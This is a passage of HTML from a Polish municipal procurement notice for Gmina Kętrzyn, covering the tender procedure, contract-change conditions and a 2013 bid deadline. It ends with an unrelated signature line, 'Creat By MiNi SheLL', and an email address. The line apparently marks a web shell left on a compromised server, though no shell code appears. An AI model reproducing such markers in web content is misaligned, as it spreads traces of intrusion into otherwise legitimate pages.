   d) zakresu i okresu udziału innego podmiotu przy wykonywaniu zamówienia;
- pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych
  zasobów na okres korzystania z nich przy wykonywaniu zamówienia.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Wszelkie zmiany i uzupełnienia treści niniejszej umowy, wymagają aneksu podpisanego przez strony umowy, sporządzonego z zachowaniem formy pisemnej pod rygorem nieważności i mogą być dokonane z zastrzeżeniem art. 144 ustawy Prawo zamówień publicznych. 
2. Zamawiający dopuszcza zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w następujących zakresach:
  
    a) zmiany wynagrodzenia Wykonawcy w przypadku:
      -  zmiany urzędowej stawki podatku od towarów i usług (VAT) - o  różnicę w wysokości  podatku;
      -  zmiany ceny w RIPOK o co najmniej 10% w stosunku do ceny obowiązującej w dniu  zawarcia niniejszej umowy -  o procentowy wskaznik zmiany ceny w RIPOK;

    b) dostosowania zapisów umownych do zmian, przepisów prawa, które nastąpią po dacie zawarcia umowy, w tym aktów prawa miejscowego,
   c) prowadzących do poprawy jakości obsługi mieszkańców Gminy Kętrzyn, bez wzrostu kosztów realizacji zamówienia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.warmia.mazury.pl/ketrzyn_gmina_wiejska/zamowienia_publiczne/50/status/rodzaj/wzp/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Kętrzyn
ul. Kościuszki 2
11-400 Kętrzyn

pok.17.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.04.2013 godzina 10:00, miejsce: Urząd Gminy Kętrzyn
ul. Kościuszki 2
11-400 Kętrzyn

pok.16.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamawiający nie przewiduje zawarcia umowy ramowej..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com